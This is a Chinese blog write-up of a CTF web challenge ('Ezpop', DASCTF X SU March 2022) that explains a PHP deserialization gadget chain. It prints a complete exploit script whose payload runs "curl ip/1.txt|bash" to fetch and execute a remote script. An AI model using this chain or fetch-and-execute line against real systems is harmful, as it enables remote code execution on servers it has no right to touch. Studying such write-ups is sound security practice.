DASCTF X SU三月赛

已于 2022-03-27 23:11:50 修改
阅读量561 收藏
点赞数 1
分类专栏: CTF 文章标签: php
于 2022-03-27 23:10:59 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Re_ly0n/article/details/123781083
版权

Ezpop

        emmmm,我记得我发了,刚刚一看没有,麻了,再发一次吧。因为疫情学校周末开始补课了,昨天就中午看了看题,做了一个web,挺简单的简单记录下。利用链很好找。说下坑点吧。当用hackerbar传入cmd参数时要使用raw,如下

然后导致我以为是需要原生类进行反序列化。

利用链

fin::__destruct()---->what::__toString()----->fin::run----->crow::__invoke()----->fin::world()----->fin::__call()----->mix::get_flag()

到达get_flag()后绕过#号过滤采用换行符。

exp 如下

<?php
class crow
{
    public $v1;
    public $v2;
}

class fin
{
    public $f1;

}

class what{
    public $a;
}
class mix{
    public $m1;
}
//
$a = new fin();
$e = new fin();
$f = new fin();
$b = new what();
$c = new mix();
$d = new crow();

$a->f1=$b;
$b->a=$e;
$e->f1=$d;
$d->v1=$f;
$f->f1=$c;
$c->m1="\nsystem('curl ip/1.txt|bash');";

echo urlencode(serialize($a));

 成功得到flag

另外两题没有看,有时间了再进行复现吧。

ly0n
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
可以独立编译的CWP-SU ximage指令的源代码
05-03
CWP-SU ximage指令是Seismic Unix(SU)软件包中的一个重要组成部分,它主要用于处理地震数据。Seismic Unix是一个广泛使用的开源地震成像和数据分析软件,由科罗拉多矿业学院(CWP,Center for Wave Phenomena)...
su文件用于获取root权限
05-13
在Android系统中,`su` 文件是一个至关重要的组件,它使得用户可以获取到系统的超级用户权限,也就是我们常说的root权限。Root权限是Android系统中的一种高级权限,允许用户访问和修改系统的受保护部分,包括系统...
2022DASCTF7月赋能(复现)
m0_62422842的博客
07-28 2547
DASCTF七月赋能的三个web题复现,涉及到sql注入,模板注入,php反序列化以及session文件包含
DASCTF部分复现
qq_63928796的博客
08-08 2370
过滤了大括号 {{,我们可以用 {%print(......)%} 或 {% if ... %}1{% endif %} 的形式来代替,但是题目还过滤了 print 关键字,所以前者用不了了,只能用 {% if ... %}success{% endif %} 的形式来bypass了。因为whatisthis里头的数字,有的很大,我们尝试生成一个小数点长度在10000的圆周率出来,看看能得到什么,圆周率生成的脚本用的是下面这个网址的大佬的脚本。首先利用FTK挂载一下vmdk文件,得到加密的磁盘。...
DASCTF Apr.2023 X SU Writeup By AheadSec
末初的CSDN博客
04-23 5064
DASCTF Apr.2023 X SU Writeup By AheadSec
DASCTF2022 ——十月 Web 部分Writeup
渗透测试研究中心
10-28 1480
EasyPOP题目环境是 php 7.4, 图省事直接把所有属性的类型都改成 public起点是 sorry 类的__destruct(), 由echo $this->hint调用到 show 类的__toString()方法, 然后通过执行$this->ctf->show()跳转 secret_code 类的__call(), 进而到show()方法, ...
【2022DASCTF X SU三月春季挑战 web复现
errorr0
04-20 1517
DASCTF
华为光猫SU密码计算器
02-13
华为光猫telnet进入root账户后su提权会产生动态用户名,此软件就是用来解析动态用户名的密码软件。使用起来很方便。
SU1X-开源
05-12
"SU1X-开源"是一个专门针对Windows XP / Vista / Win7操作系统的工具,它的主要目的是简化客户端的网络配置过程,无论是有线还是无线网络。这个工具特别强调大规模部署和高度可定制性,使得它在学术环境或其他需要...
SU转化器2020最新,su版本转换器
05-07
SU转化器2020最新是一款专为解决SketchUp模型版本转换问题的工具。SketchUp,简称SU,是由Trimble Navigation公司开发的一款流行的3D建模软件,广泛应用于建筑设计、室内设计、景观设计等多个领域。SketchUp的不同...
DASCTF 2022九月WEB
weixin_43952190的博客
09-22 768
CTF
2022DASCTF X SU 三月春季挑战 checkin 各种脚本学习分析
臭nana的博客
04-03 4595
只能溢出0x10个字节,刚好能够覆盖返回地址,所以得利用栈迁移来做 第一种:利用magic_gadget修改got表中setvbuf的值 在64位程序的_do_global_dtors_aux中有这么一个gadget十分有用,可以直接改栈数据magic_gadget:add dword ptr [rbp - 0x3d], ebx ; nop ; ret 利用read函数溢出,迁移栈到bss段上,然后通过一些小gadget调整寄存器的值来达到目的 出处:2022DASCTFXSU三月春季挑战-p
DASCTF 2023 & 0X401七月暑期挑战-Crypto复现
Emmaaaaa's blog
07-24 943
关键词:光滑数,Franklin-Reiter相关消息攻击,copper求t,groebner_basis() 之前做过相关消息攻击的题,但都是那种一眼就能看出来的,这次遇到两道不寻常的,值得记录,求解方法也更加多元化了哈哈,只能说还有待提高,继续加油吧!
DASCTF X GFCTF 2024|四月开启第一局
最新发布
qq_61670993的博客
04-21 908
简单题
[DASCTF 2023]controlflow
CHTXRT的博客
07-22 343
直接反编译,通过汇编代码结合动态调试综合分析,得到输入数据变化过程大致如下:(设输入字符串为。出处:https://blog.csdn.net/CHTXRT。」创作共享协议,转载请在文章明显位置注明作者及出处。
2022DASCTF X SU 三月春季挑战——REVERSE——easyre
qq_39763436的博客
03-31 770
2022DASCTF X SU 三月春季挑战 反序列化之签到题(easyre) 1、使用ExeinfoPe工具查看一下easyre.exe的详细信息,可以看到这个程序加了一个.aspack类型的壳; 2、使用Unpacker_ASPack工具进行自动脱壳,点击Dump,进行脱壳,并另存为; 3、使用较新版本的IDA打开,按F5进行反编译,找到main()函数后,对代码进行分析; 4、这个Destination就是我们需要的,而代码中只有这个函数sub_401771(Destination)用到
2021-DASCTF-三月-Writeup
热门推荐
末初的CSDN博客
03-29 1万+
文章目录WEBMISC签到简单的png隐写雾都孤儿小田的秘密Ascii_art问卷调查 和团队的师傅们组队拿了个第十,师傅们带飞,我就是团队的MVP(Most Vegetable People) WEB 等复现环境出来了再写 MISC 签到 公众号语音识别:异世相遇!尽享美味!安恒高! 见笑了,偶四南方银,藕的普通话不镖准哈哈哈~ DASCTF{welcome_to_march_dasctf} 简单的png隐写 一开始以为hint.png是伪加密,flag.jpg是真加密,结果后
安恒月 DASCTF 7月
pone2233的博客
07-25 1186
文章目录比介绍比感受Miscwelcome to the misc world | 成功QrJoker | 未验证过,因为比结束了 比介绍 安恒月 DASCTF 7月感受 这次太菜了,都做只做了2个,哎,我觉得还需要锻炼,加油。 Misc welcome to the misc world | 成功 拿到文件使用7z这个压缩包软件,直接能看到这个flag,在这里,可是需要解压密码 我就开始分析一下这个给的素材 在图片红色通道看到png的格式 点击这个Save Bin 保存一个图片文件
DASCTF 2023 & 0X401七月暑期挑战 Web方向 EzFlask ez_cms MyPicDisk 详细题解wp
Jay17的博客
08-05 1433
DASCTF 2023 & 0X401七月暑期挑战 Web方向 EzFlask ez_cms MyPicDisk 详细题解wp
2022dasctf x su 三月春季挑战
03-16
非常感谢您的关注和参与,2022年的DASCTF x SU三月春季挑战将会是一场精彩的比。我们将会为参者提供丰富多彩的挑战,让大家可以在比中不断提升自己的技能和能力。希望您能够积极参与,共同创造一个充满挑战和乐趣的比
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值